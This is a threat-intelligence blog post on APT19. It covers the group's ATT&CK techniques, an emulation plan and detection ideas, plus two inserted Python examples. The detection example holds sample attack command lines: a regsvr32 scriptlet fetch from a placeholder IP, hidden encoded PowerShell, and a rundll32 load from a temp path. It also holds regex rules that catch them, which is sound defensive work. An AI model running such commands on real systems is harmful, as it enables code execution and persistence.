#ThreatThursday - APT19

Introducing #ThreatThursday

Adversarial Emulation is a threat intelligence driven process. Leveraging threat intelligence is required for more effective defense (Blue Team) and offense (Red Team). We must understand how threats operate and their behaviors (tactics, techniques, and procedures) to stay ahead of them and prevent or detect when they attack our organization. For these reasons, we want to share our vision for being threat-led with our readers and introduce #ThreatThursday.

For #ThreatThursday posts we plan to:

  • Introduce a threat
  • Extract adversary TTPs from Cyber Threat Intelligence
  • Emulate those TTPs
  • Cover techniques to defend against those TTPs 

At a high level, we will consume Cyber Threat Intelligence and map it to MITRE ATT&CK. We may use other MITRE tools like ATT&CK Navigator for visualization and for creating a threat profile. Based on the TTPs of the threat actor, we will create an adversary emulation plan and technically demonstrate the adversary in action with our enterprise-grade C2 framework, SCYTHE. Finally, we will show how Blue Teams can prevent or detect that adversary before it successfully breaches your organization.

APT19

For this first #ThreatThursday we will start with APT19. APT19 is not a very sophisticated threat actor: it has only 20 known TTPs and mostly uses Empire and Cobalt Strike. This makes it an ideal candidate for organizations beginning a threat-led defense.

Cyber Threat Intelligence

Our first step is to acquire threat intelligence about APT19. The MITRE ATT&CK site is a great starting point. Click on Groups on the top menu bar and select APT19. Here we learn some basic information about APT19 such as its objectives, associated group names, techniques and software used, and references to Cyber Threat Intelligence for further reading.

APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same.

The various techniques are listed on the MITRE ATT&CK page, but we can use ATT&CK Navigator to create a graphical representation of this threat actor.

Visit the ATT&CK Navigator site hosted on GitHub (the site can also be built and hosted internally for tracking and adding notes to TTPs). On the top right “selection controls” bar, click the third icon from the left, “multi-select”. Then click “select” next to APT19. You will notice that some rectangles in the ATT&CK matrix now have borders. Click the “multi-select” button again to close that menu. Then, on the top right “technique controls” bar, select the second icon from the left, “background color”, and click the red color. The techniques attributed to APT19 are now red, as can be seen below in Figure 1.

[Figure 1: ATT&CK Navigator matrix with the techniques attributed to APT19 highlighted in red]

This offers a quick method of obtaining Cyber Threat Intelligence from a threat actor and mapping it to MITRE ATT&CK for creating an Adversary Emulation plan.

Adversary Emulation Plan

Now it is time to arrange the APT19 TTPs into an attack flow that can be emulated. The simplest method is a table that covers the tactic, the techniques, and some notes. Start with the description of the group and their objective. The objective is the end goal of the adversary emulation; in the case of APT19, it is to gain persistence on an internal network.

The next step is to map out the tactics and techniques that will be emulated. From a Red Team perspective, we generally set up Command and Control first, then Initial Access, and then the other Tactics as can be seen in Table 1.

Tactic | Description
Description | APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services.
Objective | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.
Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server
Initial Access | Spearphishing attachment (T1193); Spearphishing link (T1192)
Execution | Rundll32 (T1085); User Execution (T1204); Hidden Windows (T1143); PowerShell (T1086); Obfuscated Files or Information (T1027); DLL Side-Loading (T1073)
Discovery | System Owner/User Discovery (T1033); System Information Discovery (T1082); System Network Configuration Discovery (T1016)
Persistence | Registry Run Keys/Startup Folder (T1060)
Defense Evasion | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques

Table 1 - APT19 Adversary Emulation Plan
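The Navigator click-through above and Table 1 can be joined up in code. The following Python is an added example, not from the post or from SCYTHE: it parses the technique cells exactly as written in Table 1 and emits an ATT&CK Navigator layer file that colours those techniques red. The layer fields used (version 2.2, domain mitre-enterprise, techniqueID/tactic/color/comment) are assumed from the Navigator layer format of that era.

```python
import json
import re

# Technique cells as written in Table 1 of the post (tactic -> "Name (Txxxx) - note; ...").
TABLE_1 = {
    "Command and Control": "Commonly Used Port (T1043) - TCP port 80; Standard Application Layer "
                           "Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); "
                           "Data Encoding (T1132) - used Base64 to encode communications to the C2 server",
    "Initial Access": "Spearphishing attachment (T1193); Spearphishing link (T1192)",
    "Execution": "Rundll32 (T1085); User Execution (T1204); Hidden Windows (T1143); PowerShell (T1086); "
                 "Obfuscated Files or Information (T1027); DLL Side-Loading (T1073)",
    "Discovery": "System Owner/User Discovery (T1033); System Information Discovery (T1082); "
                 "System Network Configuration Discovery (T1016)",
    "Persistence": "Registry Run Keys/Startup Folder (T1060)",
    "Defense Evasion": "Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within "
                       "a SCT file to bypass application whitelisting techniques",
}

# One technique entry: "<name> (T1234)" optionally followed by " - <note>", entries separated by ';'.
CELL = re.compile(r"\s*(?P<name>[^;(]+?)\s*\((?P<id>T\d{4})\)(?:\s*-\s*(?P<note>[^;]*))?")

def parse_table(table):
    """Return [(tactic, technique_id, name, note)] for every technique in the table cells."""
    rows = []
    for tactic, cell in table.items():
        for m in CELL.finditer(cell):
            rows.append((tactic, m.group("id"), m.group("name").strip(),
                         (m.group("note") or "").strip()))
    return rows

def navigator_layer(rows, name="APT19 (from Table 1)"):
    """Build a Navigator layer dict (assumed v2.2 schema) with each technique coloured red.
    The tactic slug is the Navigator form of the tactic name, e.g. 'command-and-control'."""
    return {
        "name": name,
        "version": "2.2",
        "domain": "mitre-enterprise",
        "techniques": [
            {"techniqueID": tid, "tactic": tactic.lower().replace(" ", "-"),
             "color": "#ff6666", "comment": note, "enabled": True}
            for tactic, tid, _name, note in rows
        ],
    }

if __name__ == "__main__":
    # Write the layer to stdout; save it as .json and load it via Navigator's "Open Existing Layer".
    print(json.dumps(navigator_layer(parse_table(TABLE_1)), indent=2))
```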

Emulating APT19

With an adversary emulation plan, it is now time to set up our command and control framework and emulate the various TTPs that have been selected.

This threat can be imported into SCYTHE by downloading the JSON from our GitHub community threats repository. Import it into SCYTHE and run your own campaign. To import a JSON file, go to Threat Manager - Migrate Threats - Choose File - Import.

Jorge Orchilles did a much longer presentation on the Adversary Emulation process, emulating APT19 with Empire and SCYTHE, and tracking the exercise with VECTR for the Brazilian community GoHacking. It is available here: https://www.youtube.com/watch?v=YMTlrjkbZHM

Defending APT19

APT19 is a lower-sophistication actor that leverages Cobalt Strike and Empire. Most organizations should have built-in anti-malware detection against these types of vanilla payloads. The focus should be more on detecting the behaviors, particularly the use of LOLBAS (Living Off The Land Binaries and Scripts): Microsoft-signed binaries that are abused for malicious activity. Here are some ideas:

  • Monitor outbound HTTP connections, particularly beacons that match patterns. Here is a great article from our friends at Black Hills Information Security: https://www.blackhillsinfosec.com/detecting-malware-beacons-with-zeek-and-rita/
  • Enable logging on PowerShell and monitor it for malicious activity
  • Review use of Rundll32.exe to load arbitrary DLLs
  • Inspect startup folders and registry run keys for persistence mechanisms
  • Review use of Regsvr32.exe for loading arbitrary scripted files
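The Rundll32, PowerShell, run-key and Regsvr32 ideas above can be expressed as simple behavioural rules over endpoint telemetry. The following Python is an added example, not code from the post or from SCYTHE: it runs four rules, each tagged with the Table 1 technique it covers, over a handful of constructed Sysmon-style events (process creation and registry value set) and reports which fire. The event field names follow Sysmon's Image, CommandLine and TargetObject; the sample events themselves are made up.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 13 = registry value set).
# These are made-up samples for the demo, not real telemetry from any incident.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,Start"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc QQBCAEMA"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},  # benign, must not fire
    {"EventID": 13, "Image": r"C:\Windows\System32\regsvr32.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\upd"},
]

# Paths a standard user can write to; a signed host binary loading code from here is suspect.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp|AppData)\\", re.I)

def _proc(ev, exe):
    """True when ev is a process-creation event for the given executable name."""
    return ev["EventID"] == 1 and ev["Image"].lower().endswith(exe)

# Each rule: (Table 1 technique ID, what it looks for, predicate over one event).
RULES = [
    ("T1117", "regsvr32 fetching a scriptlet (SCT) over HTTP(S)",
     lambda e: _proc(e, "regsvr32.exe") and re.search(r"/i:https?://", e["CommandLine"], re.I)),
    ("T1085", "rundll32 loading a DLL from a user-writable path",
     lambda e: _proc(e, "rundll32.exe") and USER_WRITABLE.search(e["CommandLine"])),
    ("T1086", "PowerShell started with an encoded command or hidden window",
     lambda e: _proc(e, "powershell.exe")
     and re.search(r"-(enc\w*|w(indowstyle)?\s+hidden)", e["CommandLine"], re.I)),
    ("T1060", "value written under a CurrentVersion\\Run key",
     lambda e: e["EventID"] == 13
     and re.search(r"\\CurrentVersion\\Run\\", e["TargetObject"], re.I)),
]

def hunt(events):
    """Return [(technique_id, description, event)] for every rule that fires on each event."""
    return [(tid, desc, ev) for ev in events for tid, desc, pred in RULES if pred(ev)]

if __name__ == "__main__":
    for tid, desc, ev in hunt(EVENTS):
        print(tid, desc, "::", ev.get("CommandLine") or ev.get("TargetObject"))
```

In production these rules need tuning against your own baseline (installers legitimately write run keys, and some admin tooling uses hidden PowerShell windows), but the structure of tagging each rule with its ATT&CK technique lets the results map straight back onto the emulation plan.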

Conclusion

This was our first #ThreatThursday, covering the overall flow of the information we want to share with our readers to push the industry forward into threat-led defense. We have consumed threat intelligence for APT19, extracted the TTPs, created an adversary emulation plan, performed the adversary emulation with SCYTHE, saved and shared the threat so you can run it as well, and provided techniques to detect APT19. We hope you enjoyed it and found it valuable. Let us know what you think and what threats you’d like to see in the future. And, contact us if you’re interested in building or taking your threat-led defense to the next level. We provide Purple Team consulting to help build the capability or run exercises, and of course our platform, SCYTHE, gives you the power to run them on your own.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io.